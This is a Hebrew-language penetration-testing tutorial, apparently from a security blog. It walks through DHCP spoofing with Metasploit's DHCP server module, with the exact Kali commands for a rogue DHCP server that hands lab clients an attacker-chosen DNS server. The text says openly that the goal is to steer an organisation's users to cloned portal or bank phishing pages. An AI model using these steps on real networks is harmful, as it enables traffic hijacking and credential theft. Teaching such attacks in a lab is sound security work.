Home אבטחת מידעPenetration Testing - Offense הסבר וביצוע DHCP Spoofing ע”י Metasploit

הסבר וביצוע DHCP Spoofing ע”י Metasploit

by Tal Ben Shushan 27/01/2018 0 comment
הסבר וביצוע DHCP Spoofing ע”י Metasploit
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

ביצוע DHCP Spoofing ע”י Metasploit


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


DHCP Spoofing, מאפשר לנו ליצור מצב בו אנחנו יוצרים מצב בו הDHCP שיצרנו הוא למעשה הDHCP שיחלק כתובות IP למחשבים ברשת.
נאמר ובארגון שאותו אתם תוקפים קיים שרת DHCP ואתם מעוניינים ל”השתלט” על אותו שרת DHCP, הדרך היעילה ביותר היא לבצע DHCP Spoofing שכן אתם יוצרים שרת DHCP משלכם ואז מחלקים את הכתובות שאתם רוצים.
המטרה הראשית היא לוא דווקא לחלק כתובות IP סתם למשתמשים אלא להחליט איזה שרתי DNS יחולקו להם ובכך תוכלו ליצור Phishing בקלות רבה יותר, נאמר תעתיקו את הפורטל שלהם או אתר של בנק או מערכת כספים כזו או אחרת ואז בשרת ה DNS שלכם תגדירו שהם מגיעים לשרת ה Phishing שלכם.

דרוש:

  • KALI מותקן
  • מחשב Windows 10/8/7 שמוגדר לקבל כתובת IP אוטומטי DHCP

נפתח בKALI את הטרמינל ונרשום

sudo  route add default gw 192.168.1.1 eth0

בפקודה זו נגדיר שהDefault Gateway לכרטיס הרשת eth0 הוא 192.168.1.1

כעת נפתח את Metasploit

sudo msfconsole

כעת נשתמש ב Auxiliary של DHCP על מנת ליצור “DHCP” משלנו

use auxiliary/server/dhcp

נגדיר את טווח הכתובות שהוא יחלק, נתחיל מהכתובת 192.168.1.150

set DHCPIPSTART 192.168.1.150

נגדיר עד איזה כתובת הוא יחלק

set DHCPIPEND 192.168.1.155

סה”כ 6 כתובות

כאן ההגדרה החשובה, איזה DNS הוא יחלק, כמובן שאתם צריכים ליצור שרת DNS ולהגדיר אותו שיבצע Forward לDNS של אותו ארגון ורק דברים מסויימים שרת ה DNS שלכם יענה, כך המשתמשים לא יבחינו שDHCP אחר מחלק להם כתובות

set DNSSERVER 192.168.1.160

כעת נגדיר את כתובת השרת שלכם

set SRVHOST 192.168.1.160

נגדיר את ה Subnet Mask

set NETMASK 255.255.255.0

נגדיר את ה Default Gateway

set ROUTER 192.168.1.1

כעת נבדוק שהכל תקין

show options

מעולה, כעת נריץ את ה DHCP Spoofing

run

מאמרים קשורים

Leave a Comment